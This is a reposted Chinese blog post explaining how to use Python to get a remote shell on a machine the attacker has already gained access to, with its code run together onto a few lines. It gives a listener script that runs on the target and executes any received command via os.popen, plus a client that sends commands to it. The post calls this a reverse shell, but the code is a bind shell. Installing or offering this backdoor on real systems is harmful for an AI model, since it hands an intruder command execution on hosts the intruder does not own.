利用python模拟菜刀反弹shell绕过限制
生活随笔
收集整理的這篇文章主要介紹了
利用python模拟菜刀反弹shell绕过限制
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
有的時候我們在獲取到目標電腦時候如果對方電腦又python 編譯環境時可以利用python 反彈shell
主要用到python os庫和sokect庫
這里的服務端在目標機上運行
from socket import * from os import * s=socket(AF_INET,SOCK_STREAM)#IVP4 尋址 tcp協議 s.bind(('',6666))#補丁端口 s.listen(1)#開始監聽一個隊列 while True:sock,addr=s.accept()#返回兩次 第一次返回連接地址 二 端口號print ('客戶端:',addr)while True:cmd=sock.recv(1024)#緩存長度 接收傳遞過來cmdstr=cmd.decode()if cmdstr=='exit':print ('客戶端:',addr,'關閉')sock.close()breakresult=popen(cmdstr).read()sock.send(result.encode()) s.close()本機運行
from socket import * from os import *c=socket(AF_INET,SOCK_STREAM)#IVP4 尋址 tcp協議 c.connect(('127.0.0.1',6666))#連接地址 while True:cmd=input("cmd:")c.send(cmd.encode())#必須傳遞流if cmd=='exit':c.close()breakdata=c.recv(1014)print (data.decode())?
轉載于:https://www.cnblogs.com/feizianquan/p/11081385.html
總結
以上是生活随笔為你收集整理的利用python模拟菜刀反弹shell绕过限制的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 设备树中#address-cells和#
- 下一篇: 选择排序算法python